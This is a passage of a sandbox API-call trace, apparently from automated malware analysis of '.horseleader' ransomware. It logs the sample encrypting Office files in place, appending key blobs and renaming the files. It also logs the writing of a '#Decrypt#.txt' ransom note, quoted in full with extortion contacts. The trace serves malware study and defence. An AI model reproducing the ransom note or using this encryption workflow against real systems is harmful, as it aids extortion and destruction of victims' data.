(lpString1="OARPMANR.DLL", lpString2="Windows") returned -1 [0237.064] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0237.064] StrStrIW (lpFirst="OARPMANR.DLL", lpSrch=".horseleader") returned 0x0 [0237.064] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.064] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="_uninstalling_.png") returned 1 [0237.064] lstrlenW (lpString=".testttjffg") returned 11 [0237.064] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL", lpSrch=".testttjffg") returned 0x0 [0237.064] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.064] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0237.065] StrStrW (lpFirst="OARPMANR.DLL", lpSrch=".txt") returned 0x0 [0237.065] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11656) returned 1 [0237.065] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d88, lpOverlapped=0x0) returned 1 [0237.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd278, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.071] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d88, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2d88, lpOverlapped=0x0) returned 1 [0237.072] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.072] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.072] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.072] CloseHandle (hObject=0x1a4) returned 1 [0237.072] GetProcessHeap () returned 0x780000 [0237.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.073] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.horseleader") returned 89 [0237.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.horseleader")) returned 1 [0237.074] GetProcessHeap () returned 0x780000 [0237.074] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.074] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x4d183e00, ftCreationTime.dwHighDateTime=0x1ca520c, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4d183e00, ftLastWriteTime.dwHighDateTime=0x1ca520c, nFileSizeHigh=0x0, nFileSizeLow=0x795, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="README.HTM", cAlternateFileName="")) returned 1 [0237.074] lstrcmpiW (lpString1="README.HTM", lpString2="Windows") returned -1 [0237.074] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0237.074] StrStrIW (lpFirst="README.HTM", lpSrch=".horseleader") returned 0x0 [0237.074] lstrcmpW (lpString1="README.HTM", lpString2="#Decrypt#.txt") returned 1 [0237.074] lstrcmpW (lpString1="README.HTM", lpString2="_uninstalling_.png") returned 1 [0237.075] lstrlenW (lpString=".testttjffg") returned 11 [0237.075] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpSrch=".testttjffg") returned 0x0 [0237.075] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.075] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0237.076] StrStrW (lpFirst="README.HTM", 
lpSrch=".txt") returned 0x0 [0237.076] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1941) returned 1 [0237.077] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x795, lpOverlapped=0x0) returned 1 [0237.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff86b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x795, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x795, lpOverlapped=0x0) returned 1 [0237.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.079] CloseHandle (hObject=0x1a4) returned 1 [0237.079] GetProcessHeap () returned 0x780000 [0237.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.080] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.horseleader") returned 87 [0237.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\1033\\readme.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.horseleader")) returned 1 [0237.081] GetProcessHeap () returned 0x780000 [0237.081] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.081] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb401ca00, ftCreationTime.dwHighDateTime=0x1cbdec9, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb401ca00, ftLastWriteTime.dwHighDateTime=0x1cbdec9, nFileSizeHigh=0x0, nFileSizeLow=0x19b80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="xlsrvintl.dll", cAlternateFileName="XLSRVI~1.DLL")) returned 1 [0237.081] lstrcmpiW (lpString1="xlsrvintl.dll", lpString2="Windows") returned 1 [0237.081] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0237.081] StrStrIW (lpFirst="xlsrvintl.dll", lpSrch=".horseleader") returned 0x0 [0237.081] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="#Decrypt#.txt") returned 1 [0237.081] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="_uninstalling_.png") returned 1 [0237.081] lstrlenW (lpString=".testttjffg") returned 11 [0237.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll", lpSrch=".testttjffg") returned 0x0 [0237.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0237.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0237.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0237.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0237.091] StrStrW (lpFirst="xlsrvintl.dll", lpSrch=".txt") returned 0x0 [0237.091] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=105344) returned 1 [0237.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.092] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.094] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.094] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.095] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa5c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.095] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.107] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.107] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.107] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.107] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0237.108] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0237.108] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0237.108] CloseHandle (hObject=0x1a4) returned 1 [0237.109] GetProcessHeap () returned 0x780000 [0237.109] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0237.109] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" 
| out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.horseleader") returned 90 [0237.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.horseleader")) returned 1 [0237.110] GetProcessHeap () returned 0x780000 [0237.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0237.110] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb401ca00, ftCreationTime.dwHighDateTime=0x1cbdec9, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb401ca00, ftLastWriteTime.dwHighDateTime=0x1cbdec9, nFileSizeHigh=0x0, nFileSizeLow=0x19b80, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="xlsrvintl.dll", cAlternateFileName="XLSRVI~1.DLL")) returned 0 [0237.111] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0237.111] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\#Decrypt#.txt") returned 78 [0237.111] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.112] lstrlenA (lpString="All your files 
have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0237.112] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0237.113] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0237.113] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0237.113] CloseHandle (hObject=0x158) returned 1 [0237.114] 
GetProcessHeap () returned 0x780000 [0237.114] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703dbc00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xd80a4ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x703dbc00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x310788, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0237.114] lstrcmpiW (lpString1="ACECORE.DLL", lpString2="Windows") returned -1 [0237.114] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0237.114] StrStrIW (lpFirst="ACECORE.DLL", lpSrch=".horseleader") returned 0x0 [0237.114] lstrcmpW (lpString1="ACECORE.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.114] lstrcmpW (lpString1="ACECORE.DLL", lpString2="_uninstalling_.png") returned 1 [0237.114] lstrlenW (lpString=".testttjffg") returned 11 [0237.114] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL", lpSrch=".testttjffg") returned 0x0 [0237.114] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0237.114] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0237.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0237.116] StrStrW (lpFirst="ACECORE.DLL", lpSrch=".txt") returned 0x0 [0237.116] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3213192) returned 1 [0237.116] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.116] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.753] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.753] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.753] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x185bc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.753] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.797] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.797] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.797] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30b788, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.798] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0237.863] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0237.863] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.863] WriteFile 